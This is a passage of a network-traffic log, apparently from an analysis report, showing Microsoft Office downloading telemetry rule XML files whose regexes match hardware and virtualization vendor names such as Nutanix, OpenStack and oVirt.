            2024-11-21 08:50:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


            Session IDSource IPSource PortDestination IPDestination Port
            55192.168.2.44980913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:36 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:38 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:37 GMT
            Content-Type: text/xml
            Content-Length: 471
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
            ETag: "0x8DC582B97E6FCDD"
            x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085037Z-1777c6cb754xlpjshC1TEBv8cc0000000b00000000008n2y
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            56192.168.2.44981013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:37 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:37 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:37 GMT
            Content-Type: text/xml
            Content-Length: 419
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
            ETag: "0x8DC582B9C710B28"
            x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085037Z-1777c6cb754xrr98hC1TEB3kag0000000as0000000004z55
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


            Session IDSource IPSource PortDestination IPDestination Port
            57192.168.2.44981213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:38 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:39 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:39 GMT
            Content-Type: text/xml
            Content-Length: 419
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
            ETag: "0x8DC582BB7F164C3"
            x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085039Z-178bfbc474bv7whqhC1NYC1fg4000000014000000000fcqn
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


            Session IDSource IPSource PortDestination IPDestination Port
            58192.168.2.44981113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:38 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:39 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:39 GMT
            Content-Type: text/xml
            Content-Length: 477
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
            ETag: "0x8DC582BA54DCC28"
            x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085039Z-1777c6cb7544n7p6hC1TEByvb40000000b30000000000z0w
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:39 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            59192.168.2.44981313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:39 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:39 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:39 GMT
            Content-Type: text/xml
            Content-Length: 477
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
            ETag: "0x8DC582BA48B5BDD"
            x-ms-request-id: 449238ea-501e-0029-7d7c-3bd0b8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085039Z-1777c6cb7544n7p6hC1TEByvb40000000ax000000000eame
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:39 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            60192.168.2.44981413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:39 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:39 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:39 GMT
            Content-Type: text/xml
            Content-Length: 419
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
            ETag: "0x8DC582B9FF95F80"
            x-ms-request-id: 30ed5e4a-c01e-000b-11b8-3be255000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085039Z-r1d97b99577tssmjhC1TEB8kan0000000a40000000000x4f
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


            Session IDSource IPSource PortDestination IPDestination Port
            61192.168.2.44981513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:39 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:40 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:40 GMT
            Content-Type: text/xml
            Content-Length: 472
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
            ETag: "0x8DC582BB650C2EC"
            x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085040Z-1777c6cb754ww792hC1TEBzqu40000000am000000000hv9k
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            62192.168.2.44981613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:40 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:41 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:41 GMT
            Content-Type: text/xml
            Content-Length: 468
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
            ETag: "0x8DC582BB3EAF226"
            x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085041Z-178bfbc474bq2pr7hC1NYCkfgg00000001c00000000070db
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


            Session IDSource IPSource PortDestination IPDestination Port
            63192.168.2.44981713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:41 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:41 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:41 GMT
            Content-Type: text/xml
            Content-Length: 485
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
            ETag: "0x8DC582BB9769355"
            x-ms-request-id: c2cadd2f-601e-0001-2bab-3bfaeb000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085041Z-r1d97b99577lxltfhC1TEByw2s0000000a3000000000d1m4
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:41 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            64192.168.2.44981813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:41 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:41 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:41 GMT
            Content-Type: text/xml
            Content-Length: 411
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
            ETag: "0x8DC582B989AF051"
            x-ms-request-id: 19a81fd9-501e-0078-66bc-3b06cf000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085041Z-r1d97b99577mrt4rhC1TEBftkc0000000a40000000000ywm
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:41 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            65192.168.2.44981913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:41 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:41 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:41 GMT
            Content-Type: text/xml
            Content-Length: 470
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
            ETag: "0x8DC582BBB181F65"
            x-ms-request-id: c9d6026a-001e-0014-11f3-3a5151000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085041Z-r1d97b99577jlrkbhC1TEBq8d00000000a3g00000000169q
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:41 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            66192.168.2.44982013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:42 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:42 UTC470INHTTP/1.1 200 OK
